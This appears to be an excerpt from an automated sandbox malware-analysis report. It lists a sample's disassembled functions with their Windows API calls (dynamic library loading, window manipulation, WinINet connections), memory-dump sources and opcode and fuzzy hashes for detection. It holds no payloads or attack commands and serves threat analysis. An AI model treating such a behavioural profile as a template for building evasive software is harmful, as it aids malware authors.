                                            • Opcode ID: f59e4ebf2c02974844ef0a88cd3f2ed28690c642374fd1b9b9f6f73ffb2f0a98
                                            • Instruction ID: d8ee2b46230d67b61542f496d3a4e209f92508b9e9fecdd5d0b1b81d83a71a37
                                            • Opcode Fuzzy Hash: f59e4ebf2c02974844ef0a88cd3f2ed28690c642374fd1b9b9f6f73ffb2f0a98
                                            • Instruction Fuzzy Hash: ECD0C774944B169FD7309F65F84C652B7E4FF14711B51C81DE55AE2390DA74CC808F50
                                            Function 00840564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0084052F,?,008406D7), ref: 00840572
                                            • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00840584
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                            • API String ID: 2574300362-1587604923
                                            • Opcode ID: 30468a8ff42d013e88d39edebd92a57e9fbcae7a1bdeba3f4334930383859e49
                                            • Instruction ID: d03d278740441a142fc65e2466ad6c5c769dfae06e08a3b1a3cf7ec8554f2160
                                            • Opcode Fuzzy Hash: 30468a8ff42d013e88d39edebd92a57e9fbcae7a1bdeba3f4334930383859e49
                                            • Instruction Fuzzy Hash: 4DD09E755047169AD7306F65A84CA52BBE4FF04711B518519E965E2390DA74D8808F60
                                            Function 0085ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,0085ECBE,?,0085EBBB), ref: 0085ECD6
                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0085ECE8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                            • API String ID: 2574300362-1816364905
                                            • Opcode ID: 51bb19e0fef120102c2241b7288ae2201a9db535c0fdf8d592dadf6fc7249387
                                            • Instruction ID: e54bd05cdb1e15263f7295f4df4deaec04f0443831bfbcb2ecba822df6f54106
                                            • Opcode Fuzzy Hash: 51bb19e0fef120102c2241b7288ae2201a9db535c0fdf8d592dadf6fc7249387
                                            • Instruction Fuzzy Hash: ECD0C774510723AFDB245F65EC4D646B7E4FF04751B108419FC65D2391DB74DC849B50
                                            Function 0085BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0085BAD3,00000001,0085B6EE,?,0089DC00), ref: 0085BAEB
                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0085BAFD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: GetModuleHandleExW$kernel32.dll
                                            • API String ID: 2574300362-199464113
                                            • Opcode ID: 3dabf6d5b83c68b8a335786510d51bfe560e8e7344a288357f2cdf523eecbe5f
                                            • Instruction ID: 608f13a24dd7c70468dea1bd8da029bd09c0946c0e9c9a90455bb52267925cb5
                                            • Opcode Fuzzy Hash: 3dabf6d5b83c68b8a335786510d51bfe560e8e7344a288357f2cdf523eecbe5f
                                            • Instruction Fuzzy Hash: A9D0A734800B129FC7306F26E84CB51B7D4FF10711B008419EC53E2390D7B4C884CB11
                                            Function 00863BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,00863BD1,?,00863E06), ref: 00863BE9
                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00863BFB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                            • API String ID: 2574300362-4033151799
                                            • Opcode ID: 4d62005c7d5484b9007f554f814e799c3c92d66c6b19b6fd0a647e8d74bd1e52
                                            • Instruction ID: a8fb5e99d532afd81e91ad33ffbb697ef05526c3dccc523bba0cf09850f8c0ab
                                            • Opcode Fuzzy Hash: 4d62005c7d5484b9007f554f814e799c3c92d66c6b19b6fd0a647e8d74bd1e52
                                            • Instruction Fuzzy Hash: 09D09E745007529AD7205B65A809643BBA4FF26715F119419E455E2391E7B4D8808B50
                                            Function 00839B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 92988cdaf481a7b252c6d662e661e7c4926a30cdbad427d046188016f1ed1409
                                            • Instruction ID: 0716fca0fa316e8364ff3e51a15ec0bbff58be1cda8be77821234bd889811502
                                            • Opcode Fuzzy Hash: 92988cdaf481a7b252c6d662e661e7c4926a30cdbad427d046188016f1ed1409
                                            • Instruction Fuzzy Hash: 50C15E75A0021AEFDB14DF94C884EAEB7B5FF88704F104598E986EB251D7B0DE41DB90
                                            Function 0085AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                            Download Yara Rule
                                            APIs
                                            • CoInitialize.OLE32(00000000), ref: 0085AAB4
                                            • CoUninitialize.OLE32 ref: 0085AABF
                                              • Part of subcall function 00840213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0084027B
                                            • VariantInit.OLEAUT32(?), ref: 0085AACA
                                            • VariantClear.OLEAUT32(?), ref: 0085AD9D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                            • String ID:
                                            • API String ID: 780911581-0
                                            • Opcode ID: 503bec09a9c2eb6421bb6a86b1ae141d048c34f52e64b95cae3041416a8f19f5
                                            • Instruction ID: b97d6e22f8b52adde3683bc1788a095cb3a2839d811e74df3512a22584e50398
                                            • Opcode Fuzzy Hash: 503bec09a9c2eb6421bb6a86b1ae141d048c34f52e64b95cae3041416a8f19f5
                                            • Instruction Fuzzy Hash: 9AA116352047019FCB15EF18C891A5AB7E5FF88715F148549FA9ADB3A2CB30ED48CB86
                                            Function 008391CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Variant$AllocClearCopyInitString
                                            • String ID:
                                            • API String ID: 2808897238-0
                                            • Opcode ID: 63bca090e538f53b01fba4a472abd5f20f8931d50ee2ed0c4d3bcd15ccf0d990
                                            • Instruction ID: 62d60d36c6c5168874ce49de430819b8f3db8c77c4a09ea0427134c9fd2bc0f3
                                            • Opcode Fuzzy Hash: 63bca090e538f53b01fba4a472abd5f20f8931d50ee2ed0c4d3bcd15ccf0d990
                                            • Instruction Fuzzy Hash: 4E51A670640306DBDB24AF69D891A6EB3E5FF84314F20981FE5D6C73D1DBB498808746
                                            Function 0082365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                            • String ID:
                                            • API String ID: 3877424927-0
                                            • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                            • Instruction ID: f15c66325df4b791a4ffd94f2d1edacebda08ac279fc48c6d5efddf635af7a04
                                            • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                            • Instruction Fuzzy Hash: BF51B8B0A00325AFDF248F69A8A456E77A5FF50320F248739F825D62D0D7789FD09B41
                                            Function 0086C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetWindowRect.USER32(00F465E0,?), ref: 0086C544
                                            • ScreenToClient.USER32(?,00000002), ref: 0086C574
                                            • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0086C5DA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$ClientMoveRectScreen
                                            • String ID:
                                            • API String ID: 3880355969-0
                                            • Opcode ID: ec7e9d29982fa76aabb8e5663c1bc3fa1adee2d2756e9027087db2151b64366c
                                            • Instruction ID: d69c41ed4b140ecc2ee2354ab16129a6b2eaf061ab333f7a5d9285a2363ef7a3
                                            • Opcode Fuzzy Hash: ec7e9d29982fa76aabb8e5663c1bc3fa1adee2d2756e9027087db2151b64366c
                                            • Instruction Fuzzy Hash: 07513B75A00208AFCF20DF68C884ABE7BB5FB65324F118659F9A5DB291D770ED41CB90
                                            Function 0083C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0083C462
                                            • __itow.LIBCMT ref: 0083C49C
                                              • Part of subcall function 0083C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0083C753
                                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0083C505
                                            • __itow.LIBCMT ref: 0083C55A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$__itow
                                            • String ID:
                                            • API String ID: 3379773720-0
                                            • Opcode ID: 2fcffa27580adcdf8b533df9bf4cefaab968dd47f1b371fdbb7959e646955ac2
                                            • Instruction ID: ecab665c158f6f4051c615683cca8e3d6dd0462334f4fdf047719f22cde04647
                                            • Opcode Fuzzy Hash: 2fcffa27580adcdf8b533df9bf4cefaab968dd47f1b371fdbb7959e646955ac2
                                            • Instruction Fuzzy Hash: 05418071A00208ABDF21DF58DC56BEE7BB5FF99700F000059FA05E7281DB709A458BA2
                                            Function 0086B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                            Download Yara Rule
                                            APIs
                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0086B5D1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: InvalidateRect
                                            • String ID:
                                            • API String ID: 634782764-0
                                            • Opcode ID: 2b78ee05f4938a49986007d477c8274ce8de1e4e9505cae5916c30f0b8c27f37
                                            • Instruction ID: 38852dc671b40513c27cb0e5e46c833a9af1cde5c242219845811d6207f9718f
                                            • Opcode Fuzzy Hash: 2b78ee05f4938a49986007d477c8274ce8de1e4e9505cae5916c30f0b8c27f37
                                            • Instruction Fuzzy Hash: E931C074641208BFEF208F58CC89FE87765FB1631CF664511FA52D62E2DB30A9C08B52
                                            Function 0086D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ClientToScreen.USER32(?,?), ref: 0086D807
                                            • GetWindowRect.USER32(?,?), ref: 0086D87D
                                            • PtInRect.USER32(?,?,0086ED5A), ref: 0086D88D
                                            • MessageBeep.USER32(00000000), ref: 0086D8FE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Rect$BeepClientMessageScreenWindow
                                            • String ID:
                                            • API String ID: 1352109105-0
                                            • Opcode ID: c02d7d7acc99104dce11ab0b0f4361c71d2d3464434d08b24cd037c92dcc3015
                                            • Instruction ID: 4e7287a6edb73698c917cd470779136c55f39b54e077ed93b2459b5bfd3fc01f
                                            • Opcode Fuzzy Hash: c02d7d7acc99104dce11ab0b0f4361c71d2d3464434d08b24cd037c92dcc3015
                                            • Instruction Fuzzy Hash: 7E414470F00219DFCB11DF59D888FA9BBB5FB49358F1A85A9E814DB2A1D730A942CB40
                                            Function 00834004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00834038
                                            • __isleadbyte_l.LIBCMT ref: 00834066
                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00834094
                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 008340CA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                            • String ID:
                                            • API String ID: 3058430110-0
                                            • Opcode ID: a09ab2477dea77fdbaa729fd625df4b90b57c049109755fd713aa0dbe6bbcb70
                                            • Instruction ID: 5066c984b2631b633a849702af33355da04b7bd6c19e7c9f90f6dc8e11c765f6
                                            • Opcode Fuzzy Hash: a09ab2477dea77fdbaa729fd625df4b90b57c049109755fd713aa0dbe6bbcb70
                                            • Instruction Fuzzy Hash: 9F31D030700A16AFDB299F38C854BAA7BA5FF81310F155028E661CB0A0E731E890DBD0
                                            Function 00867CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetForegroundWindow.USER32 ref: 00867CB9
                                              • Part of subcall function 00845F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00845F6F
                                              • Part of subcall function 00845F55: GetCurrentThreadId.KERNEL32 ref: 00845F76
                                              • Part of subcall function 00845F55: AttachThreadInput.USER32(00000000,?,0084781F), ref: 00845F7D
                                            • GetCaretPos.USER32(?), ref: 00867CCA
                                            • ClientToScreen.USER32(00000000,?), ref: 00867D03
                                            • GetForegroundWindow.USER32 ref: 00867D09
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                            • String ID:
                                            • API String ID: 2759813231-0
                                            • Opcode ID: 9adebdc8d6430e31410747c322ca81fbbdf586b4afe30e2a71c9317e0cd15933
                                            • Instruction ID: d19546b944c931dcb160df3c629cc5d9786922c5fdb20c03cbbff2b139185358
                                            • Opcode Fuzzy Hash: 9adebdc8d6430e31410747c322ca81fbbdf586b4afe30e2a71c9317e0cd15933
                                            • Instruction Fuzzy Hash: 46312F71900108AFDB00EFA9C8459EFFBFDFF58314B108466E815E7212DA319E458BA1
                                            Function 0086F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0081B34E: GetWindowLongW.USER32(?,000000EB), ref: 0081B35F
                                            • GetCursorPos.USER32(?), ref: 0086F211
                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0087E4C0,?,?,?,?,?), ref: 0086F226
                                            • GetCursorPos.USER32(?), ref: 0086F270
                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0087E4C0,?,?,?), ref: 0086F2A6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                            • String ID:
                                            • API String ID: 2864067406-0
                                            • Opcode ID: ffa389d72cbc4b698cc3002b5ed3eb10213afbc489135a0839b5eed64bbb0397
                                            • Instruction ID: ccda25c00f2059d0dabe06c4dae347e04998aef020fccd35a8cf06c1b97879d5
                                            • Opcode Fuzzy Hash: ffa389d72cbc4b698cc3002b5ed3eb10213afbc489135a0839b5eed64bbb0397
                                            • Instruction Fuzzy Hash: 60218079500118AFCB158F99E8A9EEA7BB9FF0A714F054069FA05872A2D3309951DF60
                                            Function 0085431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00854358
                                              • Part of subcall function 008543E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00854401
                                              • Part of subcall function 008543E2: InternetCloseHandle.WININET(00000000), ref: 0085449E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Internet$CloseConnectHandleOpen
                                            • String ID:
                                            • API String ID: 1463438336-0
                                            • Opcode ID: 5eb5315b877e19be0d978b284f4e2c79b46db196da58083dda2239d12153d9cb
                                            • Instruction ID: 8aaa22f9c27b0fe64479097eee8633f124577dbcaea33627533c5f12f3256e0a
                                            • Opcode Fuzzy Hash: 5eb5315b877e19be0d978b284f4e2c79b46db196da58083dda2239d12153d9cb
                                            • Instruction Fuzzy Hash: 6421D131200B05BBEB119F64DC00FBBBBA9FF4471AF10501ABE15D76A0DB7198699790
                                            Function 00868A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetWindowLongW.USER32(?,000000EC), ref: 00868AA6
                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00868AC0
                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00868ACE
                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00868ADC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
